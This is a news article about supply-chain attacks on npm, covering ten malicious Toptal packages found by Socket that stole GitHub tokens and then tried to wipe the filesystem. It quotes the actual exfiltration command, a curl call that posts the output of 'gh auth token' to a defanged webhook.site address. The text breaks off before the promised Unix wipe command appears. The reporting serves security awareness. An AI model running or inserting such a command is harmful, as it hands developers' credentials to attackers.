Supply-chain attacks on open source software are getting out of hand
25 July 2025
Attacks affected packages, including one with ~2.8 million weekly downloads.
It has been a busy week for supply-chain attacks targeting open source software available in public repositories, with successful breaches of multiple developer accounts that resulted in malicious packages being pushed to unsuspecting users.
The latest target, according to security firm Socket, is JavaScript code available on repository npm. A total of 10 packages available from the npm page belonging to global talent agency Toptal contained malware and were downloaded by roughly 5,000 users before the supply-chain attack was detected. The packages have since been removed. This was the third supply-chain attack Socket has observed on npm in the past week.
Poisoning the well
The hackers behind the attack pulled it off by first compromising Toptal’s GitHub Organization and from there using that access to publish the malicious packages on npm.
Researchers still don’t know precisely how the attack worked and what the precise relationship was between the GitHub repository changes and the publishing of the packages on npm. Socket said in an email that the npm publishing “likely happed through GitHub Actions or stored npm tokens, which were accessible once the GitHub Organization was breached.” GitHub and npm are often linked in workflows, allowing the publishing of npm packages once a GitHub organization is hijacked.
“The attack could have originated from compromised GitHub access that enabled both repository modifications and npm publishing, or from separate compromise vectors that affected both platforms independently,” Socket researchers wrote Wednesday. “Without additional forensic evidence, determining the precise sequence and relationship between these events remains challenging.”
Toptal has yet to say how its account was compromised. Company representatives didn’t respond to an email asking.
The malicious payload inserted into the packages had two stages. First, the code extracted the target's GitHub authentication token and sent it to an attacker-controlled endpoint at the domain webhook.site. These tokens gave the attackers persistent access to the target’s GitHub repositories, which could in turn be used in further supply-chain attacks.
The command invoking the extraction was:
curl -d "$(gh auth token)" https://webhook[.]site/fb5b4647-aff8-418c-99e7-ec830cc2024b
After the credentials were exfiltrated, the payload tried to delete the entire filesystem of the target’s device. The script contained commands for destroying file systems on either Unix-like or Windows operating systems. The Unix command used was:
Related Posts
You might also enjoy these articles on similar topics:
